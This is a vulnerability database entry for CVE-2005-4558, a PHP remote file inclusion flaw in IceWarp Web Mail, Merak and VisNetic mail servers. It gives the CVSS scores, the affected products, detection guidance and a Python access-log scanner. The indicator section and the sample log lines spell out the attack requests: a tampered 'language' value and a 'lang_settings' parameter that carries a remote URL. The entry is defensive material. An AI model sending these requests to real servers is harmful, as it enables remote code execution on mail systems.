CVE-2005-4558
published 2005-12-28

Priority: P268, medium, 6.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 8.33% (94.2th percentile)
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.

Affected

6 ranges

Vendor      Product                Version range   Fixed in
deerfield   visnetic_mail_server
deerfield   visnetic_mail_server
icewarp     web_mail
icewarp     web_mail
merak       mail_server
merak       mail_server

Detection & IOCs (extracted from sources)

url: http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
url: http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/;
path: /mail/settings.html
path: /mail/index.html
port: 32000
  • Monitor HTTP requests to /mail/settings.html containing a manipulated 'language' parameter with non-standard values (e.g., URLs or path traversal strings) — indicative of LFI exploitation attempt.
  • Monitor HTTP requests to /mail/index.html containing a 'lang_settings' parameter with array-style injection and semicolon-delimited remote URLs — indicative of RFI exploitation attempt.
  • Alert on lang_settings parameter values containing semicolons and external URLs (e.g., lang_settings[TEST]=test;http://[host]/;) in web server logs targeting IceWarp/Merak/VisNetic mail installations.
  • This vulnerability was confirmed actively exploited in the wild as of July 2007; prioritize detection on any IceWarp WebMail 5.5.1, Merak 8.3.0r, or VisNetic 8.3.0 build 1 deployments.
  • The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not directly described for the lang_settings/language parameter vectors.
  • The malicious language value is stored in a database before being executed, meaning the injection may persist and trigger on subsequent requests rather than immediately — detection must account for stored/second-order execution.
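
The monitoring rules above, written as a pass over web server access-log lines. This is an added example, not part of the original entry or of any vendor tooling; the log format, the sample lines, the rule names and the definition of a "standard" language value are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate language value is a short plain token (e.g. "english").
SAFE_LANGUAGE = re.compile(r"[A-Za-z0-9_-]{1,32}")
REMOTE_URL = re.compile(r"(?i)\b(?:https?|ftp)://")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the names of the rules a request target triggers."""
    path, _, query = target.partition("?")
    path = path.lower()
    hits = []
    # separator="&" keeps ';' inside the decoded value instead of splitting on it
    for key, value in parse_qsl(query, keep_blank_values=True, separator="&"):
        if path.endswith("/mail/settings.html") and key == "language":
            # This is the request that stores the value, so flag it at write time.
            if not SAFE_LANGUAGE.fullmatch(value):
                hits.append("settings-language-nonstandard")
        elif path.endswith("/mail/index.html") and key.startswith("lang_settings"):
            if ";" in value and REMOTE_URL.search(value):
                hits.append("index-lang_settings-remote-url")
    return hits

def scan(lines):
    """Return (line_number, rule_names) for every log line that triggers a rule."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = classify(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample lines (documentation addresses, placeholder session id).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /mail/settings.html?id=abc123&Save_x=1&language=english HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2006:10:01:00 +0000] "GET /mail/settings.html?id=abc123&Save_x=1&language=..%2F..%2Ftest HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2006:10:02:00 +0000] "GET /mail/index.html?id=abc123&lang_settings[TEST]=test;http://[host]/; HTTP/1.1" 200 900',
    '192.0.2.44 - - [01/Jan/2006:10:03:00 +0000] "GET /mail/index.html?id=abc123&lang_settings%5BTEST%5D=test%3Bhttp%3A%2F%2Fremote.example%2F%3B HTTP/1.1" 200 900',
    '192.0.2.10 - - [01/Jan/2006:10:04:00 +0000] "GET /mail/index.html?id=abc123 HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

Query strings are percent-decoded before matching, so the encoded and literal forms of the same request hit the same rule.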

CVSS provenance

nvd: v2.0, 6.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck: 6.5 MEDIUM